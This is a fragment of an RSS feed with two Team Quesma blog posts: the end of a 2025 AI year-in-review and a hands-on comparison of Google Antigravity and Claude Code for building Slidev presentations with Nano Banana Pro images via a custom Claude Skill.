&lt;li&gt;Andrej Karpathy coined the term &lt;a href="https://en.wikipedia.org/wiki/Vibe_coding" rel="noopener noreferrer"&gt;“vibe coding”&lt;/a&gt; for programming where we primarily use plain language rather than code. For me, it took time to sink in. Now, it is a thing I do for hours a day.&lt;/li&gt;
&lt;li&gt;Later, OpenAI released &lt;a href="https://openai.com/index/introducing-gpt-4-5/" rel="noopener noreferrer"&gt;GPT-4.5&lt;/a&gt; - a real marvel. While it got closed and nothing matches its ability to brainstorm - more frank, less reserved and censored, creative, adjustable - I miss it, or should I say, them. It was expensive ($2 per single run in Cursor), but &lt;a href="https://p.migdal.pl/blog/2025/04/vibe-translating-quantum-flytrap/" rel="noopener noreferrer"&gt;unparalleled at advanced translations&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;OpenAI released &lt;a href="https://openai.com/index/introducing-deep-research/" rel="noopener noreferrer"&gt;Deep Research&lt;/a&gt;, which spends time doing multiple searches and summarizing them. Initially costly and slow, but still saving time on web search.&lt;/li&gt;
&lt;li&gt;Anthropic released command line tool for agentic coding &lt;a href="https://github.com/anthropics/claude-code" rel="noopener noreferrer"&gt;Claude Code&lt;/a&gt; as research preview.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  March
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://arcprize.org/arc-agi/2/" rel="noopener noreferrer"&gt;ARC-AGI-2&lt;/a&gt; was an attempt to create a test for AI that is impossible to solve. Top models had 1% or so performance.&lt;/li&gt;
&lt;li&gt;OpenAI released its &lt;a href="https://openai.com/index/introducing-4o-image-generation/" rel="noopener noreferrer"&gt;4o Image Generation&lt;/a&gt; model, flooding the web with Studio Ghibli pastiches.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  April
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;OpenAI released &lt;a href="https://openai.com/index/introducing-o3-and-o4-mini/" rel="noopener noreferrer"&gt;o4-mini&lt;/a&gt;, a smart yet reasonably fast reasoning model. In a brief conversation, it explained Einstein’s General Theory of Relativity to me - a topic I had struggled to understand despite many approaches.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  May
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Google released &lt;a href="https://aistudio.google.com/models/veo-3" rel="noopener noreferrer"&gt;Veo 3&lt;/a&gt;, allowing us to create videos that are sometimes hard to distinguish from real recordings.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  June
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://blog.google/technology/google-deepmind/gemini-model-thinking-updates-march-2025/" rel="noopener noreferrer"&gt;Gemini 2.5 Pro&lt;/a&gt; brought Google back to the AI game. And with &lt;a href="https://blog.google/products/gemini/gemini-2-5-model-family-expands/" rel="noopener noreferrer"&gt;Gemini 2.5 Flash&lt;/a&gt;, we finally had a model good at summarization and data extraction, yet fast and cheap.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  July
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;DeepMind achieved &lt;a href="https://deepmind.google/blog/advanced-version-of-gemini-with-deep-think-officially-achieves-gold-medal-standard-at-the-international-mathematical-olympiad/" rel="noopener noreferrer"&gt;gold-level performance&lt;/a&gt; at the International Mathematical Olympiad.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  From worldwide achievement to everyday production
&lt;/h2&gt;

&lt;p&gt;And that was just the first half of 2025.&lt;/p&gt;

&lt;p&gt;Progress arrived with significant caveats. We saw impressive demos and breakthroughs that often failed in production:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Too slow or costly&lt;/strong&gt;: Early reasoning models (o1) and web search AI agents (Deep Research) were powerful but impractical for daily loops.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Overcaffeinated AI agents&lt;/strong&gt;: Tools like early Claude Code (with Sonnet 3.7) were as likely to wreak havoc on your codebase as to fix it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The uncanny valley&lt;/strong&gt;: Image generators (initial 4o Image Generation and Nano Banana) created stunning visuals but were unreliable for complicated instructions or text rendering.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The potential was undeniable, but extracting it required heavy lifting: extensive prompt engineering beforehand and rigorous auditing afterwards. It felt like managing an intern who needs constant supervision rather than collaborating with a capable colleague.&lt;/p&gt;

&lt;p&gt;For pragmatists who ignore benchmarks and hype, the calculation is simple: does the tool improve net efficiency? A model that performs a task—a technical feat in itself—is useless if it demands more time in manual cleanup than it saves.&lt;/p&gt;

&lt;h2&gt;
  
  
  Now
&lt;/h2&gt;

&lt;p&gt;A lot of things that were research achievements by the first half 2025, by its end became tools used daily.&lt;/p&gt;

&lt;h3&gt;
  
  
  Reasoning is mainstream
&lt;/h3&gt;

&lt;p&gt;The first reasoning model was OpenAI o1, released Dec 2024. Likely thanks to DeepSeek-R1, other labs could move forward, making it both smarter and faster. Now all main models do that, especially the leading ones - &lt;a href="https://openai.com/index/introducing-gpt-5-2/" rel="noopener noreferrer"&gt;GPT 5.2&lt;/a&gt;, &lt;a href="https://www.anthropic.com/news/claude-opus-4-5" rel="noopener noreferrer"&gt;Opus 4.5&lt;/a&gt; and &lt;a href="https://blog.google/products/gemini/gemini-3/" rel="noopener noreferrer"&gt;Gemini 3 Pro&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Deep research
&lt;/h3&gt;

&lt;p&gt;Now, what was costly with Deep Research is an everyday search with any major AI provider - ChatGPT or Google Gemini. The peak performance of reasoning models from early 2025 is now way faster, cheaper, and more accurate. It is no longer a separate operation, but searching is a tool, that can be done iteratively, and combined with other actions. It changes from AI that hallucinate a lot to ones that can web search and fact-check themselves.&lt;/p&gt;

&lt;h3&gt;
  
  
  Open source is back into the game
&lt;/h3&gt;

&lt;p&gt;Dec 2024, there was release of DeepSeek model, first open source model in the league of proprietary. Now, there are more. Various iterations of &lt;a href="https://api-docs.deepseek.com/news/news251201" rel="noopener noreferrer"&gt;DeepSeek&lt;/a&gt;, &lt;a href="https://moonshotai.github.io/Kimi-K2/thinking.html" rel="noopener noreferrer"&gt;Kimi-K2 Thinking&lt;/a&gt;, &lt;a href="https://www.minimax.io/news/minimaxm1" rel="noopener noreferrer"&gt;MiniMax-M1&lt;/a&gt;, &lt;a href="https://huggingface.co/zai-org/GLM-4.7" rel="noopener noreferrer"&gt;GLM-4.7&lt;/a&gt;, and &lt;a href="https://mistral.ai/news/mistral-3" rel="noopener noreferrer"&gt;Mistral 3&lt;/a&gt;. Even hell froze as &lt;a href="https://openai.com/index/introducing-gpt-oss/" rel="noopener noreferrer"&gt;OpenAI released open source models&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  AGI benchmarks
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://arcprize.org/arc-agi/2/" rel="noopener noreferrer"&gt;ARC-AGI-2&lt;/a&gt; and &lt;a href="https://en.wikipedia.org/wiki/Humanity%27s_Last_Exam" rel="noopener noreferrer"&gt;Humanity’s Last Exam&lt;/a&gt; were tests created to be purposefully hard, to last longer than typical benchmarks.&lt;/p&gt;

&lt;p&gt;Yet, by the end of 2025, for &lt;a href="https://scale.com/leaderboard/humanitys_last_exam" rel="noopener noreferrer"&gt;HLE&lt;/a&gt; Gemini 3 Pro has 37%. For &lt;a href="https://arcprize.org/leaderboard" rel="noopener noreferrer"&gt;ARC-AGI-2&lt;/a&gt;, Gemini 3 Pro solves over 30%, Claude Opus 4.5 almost 40%, and GPT-5.2 over 50%. It was not a test meant to be beaten so quickly!&lt;/p&gt;

&lt;h3&gt;
  
  
  Agentic coding
&lt;/h3&gt;

&lt;p&gt;Claude Code is de facto AGI. Not necessarily superhuman yet, but capable of doing anything. If you can operate with code, and calling external APIs, you can do anything. It took me some time to pick that, as I favoured semi-manual use of Cursor. Yet, with multiple mentions on &lt;a href="https://hn.algolia.com/?dateRange=all&amp;amp;page=0&amp;amp;prefix=false&amp;amp;query=claude%20code&amp;amp;sort=byPopularity&amp;amp;type=story" rel="noopener noreferrer"&gt;Hacker News&lt;/a&gt; I gave it a go and it permanently became one of the things in my toolbox. It’s development was nicely described in &lt;a href="https://newsletter.pragmaticengineer.com/p/how-claude-code-is-built" rel="noopener noreferrer"&gt;How Claude Code is built&lt;/a&gt; by Gergely Orosz, the Pragmatic Engineer.&lt;/p&gt;

&lt;p&gt;With Claude Sonnet 3.7 it was awkward. With great power comes great responsibility - and this model often wreaked havoc on the codebase while not solving the main issue. Yet with better and better models it became both faster and smarter: Sonnet 4 was better, then Opus 4 better but slower (and expensive), Sonnet 4.5 same power but way faster, and Opus 4.5 - same speed, but smarter.&lt;/p&gt;

&lt;p&gt;All you need is a sufficiently strong model, long context, and the ability to call tools to get everything done. They can search, gather information, extract, and visualize whatever you need. With Opus 4.5, we get a lot of power at a fast pace.&lt;/p&gt;

&lt;p&gt;Other players followed - there is &lt;a href="https://developers.openai.com/codex/cli/" rel="noopener noreferrer"&gt;Codex CLI&lt;/a&gt; by OpenAI, &lt;a href="https://github.com/google-gemini/gemini-cli" rel="noopener noreferrer"&gt;Gemini CLI&lt;/a&gt;, and &lt;a href="https://github.com/google-gemini/gemini-cli" rel="noopener noreferrer"&gt;Cursor CLI&lt;/a&gt;. See more on testing agents and models in &lt;a href="https://quesma.com/blog/compilebench-in-harbor/" rel="noopener noreferrer"&gt;Migrating CompileBench to Harbor: standardizing AI agent evals&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Image generation
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://blog.google/technology/ai/nano-banana-pro/" rel="noopener noreferrer"&gt;Nano Banana Pro&lt;/a&gt; changed the game, from images for concept art to one able to generate &lt;a href="https://quesma.com/blog/nano-banana-pro-intelligence-with-tools/" rel="noopener noreferrer"&gt;infographics&lt;/a&gt; and &lt;a href="https://quesma.com/blog/ai-is-black-mirror/" rel="noopener noreferrer"&gt;charts&lt;/a&gt; - factually correct, based on web searches. You can easily add to your agentic workflow - &lt;a href="https://quesma.com/blog/claude-skills-not-antigravity/" rel="noopener noreferrer"&gt;using Antigravity or Claude Skills&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Advanced uses
&lt;/h3&gt;

&lt;p&gt;It is no longer a tool to do maths homework or for research challenges like international olympiads. It is becoming a tool for working.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://scottaaronson.blog/?p=9183" rel="noopener noreferrer"&gt;Quantum computing researcher Scott Aaronson&lt;/a&gt; and &lt;a href="https://terrytao.wordpress.com/tag/artificial-intelligence/" rel="noopener noreferrer"&gt;Field’s Medalist Terence Tao&lt;/a&gt; use AI to advance their studies.&lt;/p&gt;

&lt;p&gt;Sure, it still makes silly mistakes. But in smart hands, it gets even smarter.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;It was the most intense year when it comes to AI development. One crucial part is that many things that were great tech demos but not usable in everyday work, are now standard tools.&lt;/p&gt;

&lt;p&gt;I just scratched the surface of selected model releases (even not all I used), not even all demos I got mesmerized by or research papers. I recommend insights &lt;a href="https://karpathy.bearblog.dev/year-in-review-2025/" rel="noopener noreferrer"&gt;2025 LLM Year in Review by Andrej Karpathy&lt;/a&gt; (also referring to his “vibe coding”), a nice overview &lt;a href="https://simonwillison.net/2025/Dec/31/the-year-in-llms/" rel="noopener noreferrer"&gt;2025: The year in LLMs by Simon Willison&lt;/a&gt; and A&lt;a href="https://news.smol.ai/" rel="noopener noreferrer"&gt;I News&lt;/a&gt;, a daily newsletter I have been following the whole year.&lt;/p&gt;

&lt;p&gt;Even if my job is fully focused on AI, and in free time I am also excited by it as well, it is impossible to keep track.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>llm</category>
    </item>
    <item>
      <title>Antigravity feels heavy and Claude Skills are light</title>
      <dc:creator>Team Quesma</dc:creator>
      <pubDate>Thu, 18 Dec 2025 13:33:38 +0000</pubDate>
      <link>https://dev.to/teamquesma/antigravity-feels-heavy-and-claude-skills-are-light-9b0</link>
      <guid>https://dev.to/teamquesma/antigravity-feels-heavy-and-claude-skills-are-light-9b0</guid>
      <description>&lt;p&gt;&lt;em&gt;This blog post was authored by &lt;a href="https://p.migdal.pl/" rel="noopener noreferrer"&gt;Piotr Migdal&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In less than a month there were three frontier model releases: Gemini 3 Pro, Claude Opus 4.5 and GPT-5.2. Moreover, Google shipped a new IDE, &lt;a href="https://antigravity.google/" rel="noopener noreferrer"&gt;Antigravity&lt;/a&gt;, promising better integration with their models and the browser.&lt;/p&gt;

&lt;p&gt;It sounds like a wonder. I saw on Hacker News &lt;a href="https://christopherkrapu.com/blog/2025/antigravity-stat-mech/" rel="noopener noreferrer"&gt;an interactive visualization of statistical physics&lt;/a&gt; - showing combination of &lt;a href="https://epoch.ai/benchmarks/gpqa-diamond" rel="noopener noreferrer"&gt;PhD-level STEM skills of Gemini 3 Pro&lt;/a&gt; combined with Antigravity browser integration. It was even more tempting as it had support of Nano Banana Pro (&lt;a href="https://quesma.com/blog/nano-banana-pro-intelligence-with-tools/" rel="noopener noreferrer"&gt;a game-changer for visualization&lt;/a&gt;, including &lt;a href="https://quesma.com/blog/ai-is-black-mirror/" rel="noopener noreferrer"&gt;creating charts&lt;/a&gt;), so it can create visual assets on the fly, having all context. It was all spiced up by the fact that &lt;a href="https://www.businessinsider.com/openai-planned-acquisition-windsurf-called-off-ceo-poached-google-2025-7?IR=T" rel="noopener noreferrer"&gt;Google acquihired Windsurf team&lt;/a&gt;, arguably the strongest competitor of Cursor.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F45fm6jx72z374q9i1pif.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F45fm6jx72z374q9i1pif.webp" alt="I liked the name Antigravity. Not just as a physicist, but as someone who loves puns and easter eggs; and Antigravity is almost definitely a play on words on [an xkcd strip](https://xkcd.com/353/) and AGI - in the comman line, it is  raw `agy` endraw ." width="800" height="497"&gt;&lt;/a&gt;I liked the name Antigravity. Not just as a physicist, but as someone who loves puns and easter eggs; and Antigravity is almost definitely a play on words on &lt;a href="https://xkcd.com/353/" rel="noopener noreferrer"&gt;an xkcd strip&lt;/a&gt; and AGI - in the comman line, it is &lt;code&gt;agy&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;I decided to give it a try - yet went back to Claude Code. Let me share why!&lt;/p&gt;




&lt;h2&gt;
  
  
  Slide side by side
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzuy9u3o2cmqvxjvlnh3w.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzuy9u3o2cmqvxjvlnh3w.webp" alt="Antigravitz and Claude Code UI side by side" width="800" height="323"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To test Antigravity vs Claude Code, I wanted to have the same project, side-by-side, spending the same amount of time and effort. The idea was not to create a proper benchmark - for that, &lt;code&gt;n=1&lt;/code&gt; would not be enough. Rather, I wanted to see not only the result, but the overall user experience.&lt;/p&gt;

&lt;p&gt;To make it a challenge, I decided to use it to create slides with Markdown using &lt;a href="https://sli.dev/" rel="noopener noreferrer"&gt;Slidev&lt;/a&gt;. That way it will make it a comprehensive check of its ability to use a framework, understand an advanced topic, and create consistent graphics. As I just had a discussion with a quantum information researcher, Artur Ekert, I went with this prompt:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Use Slidev and pnpm to create a short presentation on Device Independent Quantum Key Distribution. The presentation was to be held in Hong Kong, for a young audience - use consistent anime style for pictures. Generate images with Nano Banana Pro.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;I didn’t interfere with the content - this was a test of the workflow, not an attempt to ship the slides. Here’s the result:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flrh55uzfo7dahpgpiswv.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flrh55uzfo7dahpgpiswv.webp" alt="Example slide, created with Antigravity. See the presentation and its source." width="800" height="489"&gt;&lt;/a&gt;Example slide, created with Antigravity. See &lt;a href="https://p.migdal.pl/vibe-slides-qkd-agy/" rel="noopener noreferrer"&gt;the presentation&lt;/a&gt; and &lt;a href="https://github.com/stared/vibe-slides-qkd-agy" rel="noopener noreferrer"&gt;its source&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fujk6znhpp854i9760vjl.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fujk6znhpp854i9760vjl.webp" alt="And this example from Claude Code. See the presentation and its source." width="800" height="454"&gt;&lt;/a&gt;And this example from Claude Code. See &lt;a href="https://p.migdal.pl/vibe-slides-qkd-cc/" rel="noopener noreferrer"&gt;the presentation&lt;/a&gt; and &lt;a href="https://github.com/stared/vibe-slides-qkd-cc" rel="noopener noreferrer"&gt;its source&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;In both cases it worked! There are some rough edges, but given the ease of use, I was impressed by both. Yet, while working with Claude Code was a breeze, my experience with Antigravity was full of frustration.&lt;/p&gt;




&lt;h2&gt;
  
  
  Impressions of Antigravity
&lt;/h2&gt;

&lt;p&gt;When I need to edit files manually or check new models, I go with &lt;a href="https://cursor.com/" rel="noopener noreferrer"&gt;Cursor&lt;/a&gt; - for example, writing this blog post. Yet, here I wanted to see if Antigravity makes it better.&lt;/p&gt;

&lt;p&gt;I saw that in some cases it is better at creating websites, as it has built-in browser support (see &lt;a href="https://alokbishoyi.com/blogposts/reverse-engineering-browser-automation.html" rel="noopener noreferrer"&gt;this reverse engineering analysis&lt;/a&gt; to understand how it works). What I also discovered is that it has a native way of generating images with Nano Banana Pro. It is (allegedly) better integrated with Gemini 3 Pro. Or at least I assumed that since it is developed by Google, all context engineering tweaks will be focused on their top model as the first-class citizen.&lt;/p&gt;

&lt;p&gt;Creating images in the editor (with context of the whole project) is immensely useful. Much like why we have AI editors in the first place, rather than copying and pasting code to a chat editor, and copying it back to the project.&lt;/p&gt;

&lt;p&gt;Sadly, good things end here.&lt;/p&gt;

&lt;p&gt;The first thing I noticed was that it felt slow. The model itself isn’t lightning-fast, but Antigravity felt heavier (pun absolutely intended) than Cursor, and the built-in browser took ages. Second, the interface is underpolished - for example, when the model needs my action, it can be hidden (literally folded) in the UI. Third, it feels ill-prompted: I asked it to check something, and instead of doing that, it gets trigger-happy. Think early days of Cursor + Sonnet 3.7. Fourth, it soon told me I was out of tokens and needed to wait - with no option to pay to continue. Frankly, I don’t understand why. I guess no one does.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpwilhwfbldskemozjxqe.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpwilhwfbldskemozjxqe.webp" alt="I wanted to create a web-based game to see where Antigravity shines… but was not able to." width="800" height="494"&gt;&lt;/a&gt;I wanted to create a web-based game to see where Antigravity shines… but was not able to.&lt;/p&gt;

&lt;p&gt;I turned out to be the lucky one - as &lt;a href="https://www.promptarmor.com/resources/google-antigravity-exfiltrates-data" rel="noopener noreferrer"&gt;there are data risks&lt;/a&gt; and &lt;a href="https://old.reddit.com/r/google_antigravity/comments/1p82or6/google_antigravity_just_deleted_the_contents_of/" rel="noopener noreferrer"&gt;Google Antigravity may delete the contents of my whole drive&lt;/a&gt;. Live by vibe coding, die by vibe coding.&lt;/p&gt;

&lt;p&gt;Sure, you may give it a try - but it does not seem production-ready.&lt;/p&gt;




&lt;h2&gt;
  
  
  The bliss of Claude Code
&lt;/h2&gt;

&lt;p&gt;So, I went back to Claude Code, my go-to vibe coding tool, which I usually use within &lt;a href="https://ghostty.org/" rel="noopener noreferrer"&gt;Ghostty &lt;/a&gt;terminal.&lt;/p&gt;

&lt;p&gt;First: checking the output. Without it, you’re coding blind; generally, it makes no sense (how many of you can code a website without ever looking at it?). I use &lt;a href="https://github.com/lackeyjb/playwright-skill" rel="noopener noreferrer"&gt;lackeyjb/playwright-skill&lt;/a&gt;. It just works. And to open a website and take a screenshot it happens in the blink of an eye.&lt;/p&gt;

&lt;p&gt;Since I wanted to use Nano Banana Pro, I asked Claude Code to use an API to generate images. It took a few prompts: it tried to persuade me that Nano Banana Pro is a made-up name and that the model &lt;code&gt;gemini-3-pro-image-preview&lt;/code&gt; does not exist. This is a typical failure mode: major models can be oblivious to things past their knowledge cutoff (and they sometimes refuse to web-search because they “know better”). Fortunately, pointing it to my last blog post and the documentation helped.&lt;/p&gt;

&lt;p&gt;To avoid repeating those correction cycles (which model to use, what parameters to pass), I created a &lt;a href="https://code.claude.com/docs/en/skills" rel="noopener noreferrer"&gt;Claude Skill&lt;/a&gt;, &lt;code&gt;~/.claude/skills/nano-banana-pro&lt;/code&gt;. It has two components: &lt;code&gt;SKILL.md&lt;/code&gt; (essentially its &lt;code&gt;README.md&lt;/code&gt;) and a script that actually runs it. I use &lt;a href="https://docs.astral.sh/uv/guides/scripts/" rel="noopener noreferrer"&gt;uv scripts&lt;/a&gt; so dependencies are &lt;a href="https://packaging.python.org/en/latest/specifications/inline-script-metadata/#inline-script-metadata" rel="noopener noreferrer"&gt;declared in the header&lt;/a&gt;. I created it in no time - and you can as well. Oftentimes it may be easier to vibe code your own skill, tweaked for your use-case and workflow, than search for one. Ironically, the hardest part is &lt;a href="https://ankursethi.com/blog/gemini-api-key-frustration/" rel="noopener noreferrer"&gt;getting a Gemini API key&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fle04eoxn8efeiksq3fyy.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fle04eoxn8efeiksq3fyy.webp" alt="Since you might want to use it as well, I wrapped it as a Claude Plugin: stared/gemini-claude-skills. In addition, I added a way to consult Gemini 3 Pro - for search, reasoning, and its vision skills." width="800" height="649"&gt;&lt;/a&gt;Since you might want to use it as well, I wrapped it as a Claude Plugin: &lt;a href="https://github.com/stared/gemini-claude-skills" rel="noopener noreferrer"&gt;stared/gemini-claude-skills&lt;/a&gt;. In addition, I added a way to consult Gemini 3 Pro - for search, reasoning, and &lt;a href="https://blog.google/technology/developers/gemini-3-pro-vision/" rel="noopener noreferrer"&gt;its vision skills.&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Antigravity is a new IDE in the town. While right now there are many rough edges, I am sure it will get polished. It is hard to predict what will happen in the arena of AI-first Visual Studio Code forks.&lt;/p&gt;

&lt;p&gt;But I think that there is much bigger thing going on - skills. As Simon Willison noted, &lt;a href="https://simonwillison.net/2025/Oct/16/claude-skills/" rel="noopener noreferrer"&gt;Claude Skills are awesome, maybe a bigger deal than MCP&lt;/a&gt;. I was skeptical when I read his post (mid Oct 2025). Now it becomes mainstream, and &lt;a href="https://simonwillison.net/2025/Dec/12/openai-skills/" rel="noopener noreferrer"&gt;ChatGPT joined the skill game&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Skills make models transcend their own skills - not only because they have recipes, but because it means that they can call other models as well. That way, the gap between “which base model do you use?” shrinks. Even when a newer, better model is released, you don’t need to change your editor - you just swap what your skills call.&lt;/p&gt;

&lt;p&gt;Which skills are your favorites? And which skills do you want to teach your favourite tool today? And for generating images, would you still copy-and-paste your prompt into a chat window, or combine it with your workflow?&lt;/p&gt;

</description>
      <category>ai</category>
      <category>claude</category>
      <category>antigravity</category>
    </item>
  </channel>
</rss>
